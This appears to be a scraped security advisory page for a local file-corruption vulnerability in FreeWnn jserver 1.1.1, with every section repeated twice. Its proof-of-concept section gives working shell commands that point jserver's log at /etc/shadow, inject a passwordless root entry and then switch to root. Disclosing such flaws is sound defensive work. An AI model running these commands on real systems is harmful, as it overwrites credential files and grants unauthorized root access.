FreeWnn JServer Logging Option Data Corruption Vulnerability
BID:7918
Info
FreeWnn JServer Logging Option Data Corruption Vulnerability
| Bugtraq ID: | 7918 |
| Class: | Design Error |
| CVE: | |
| Remote: | No |
| Local: | Yes |
| Published: | Jun 14 2003 12:00AM |
| Updated: | Jun 14 2003 12:00AM |
| Credit: | Discovery of this vulnerability credited to Stefano Di Paola <[email protected]>. |
| Vulnerable: |
FreeWnn FreeWnn 1.1.1 |
| Not Vulnerable: | |
Discussion
FreeWnn JServer Logging Option Data Corruption Vulnerability
A vulnerability has been reported for FreeWnn that may result in an attacker obtaining elevated privileges.
It has been reported that jserver may allow an attacker to corrupt arbitrary files. Due to this, an attacker may be able to overwrite system files, and potentially gain elevated privileges.
A vulnerability has been reported for FreeWnn that may result in an attacker obtaining elevated privileges.
It has been reported that jserver may allow an attacker to corrupt arbitrary files. Due to this, an attacker may be able to overwrite system files, and potentially gain elevated privileges.
Exploit / POC
FreeWnn JServer Logging Option Data Corruption Vulnerability
The following proof of concept was provided:
$>/usr/bin/Wnn4/jserver -s /etc/shadow
$>/usr/bin/Wnn4/wddel -D localhost -n '
> root::12146:0:99999:7:::
> bin:*:12146:0:99999:7:::
> daemon:*:12146:0:99999:7:::
> adm:*:12146:0:99999:7:::
> lp:*:12146:0:99999:7:::
> sync:*:12146:0:99999:7:::
> shutdown:*:12146:0:99999:7:::
> halt:*:12146:0:99999:7:::
> ' -d 123
$>su -
The following proof of concept was provided:
$>/usr/bin/Wnn4/jserver -s /etc/shadow
$>/usr/bin/Wnn4/wddel -D localhost -n '
> root::12146:0:99999:7:::
> bin:*:12146:0:99999:7:::
> daemon:*:12146:0:99999:7:::
> adm:*:12146:0:99999:7:::
> lp:*:12146:0:99999:7:::
> sync:*:12146:0:99999:7:::
> shutdown:*:12146:0:99999:7:::
> halt:*:12146:0:99999:7:::
> ' -d 123
$>su -
Solution / Fix
FreeWnn JServer Logging Option Data Corruption Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.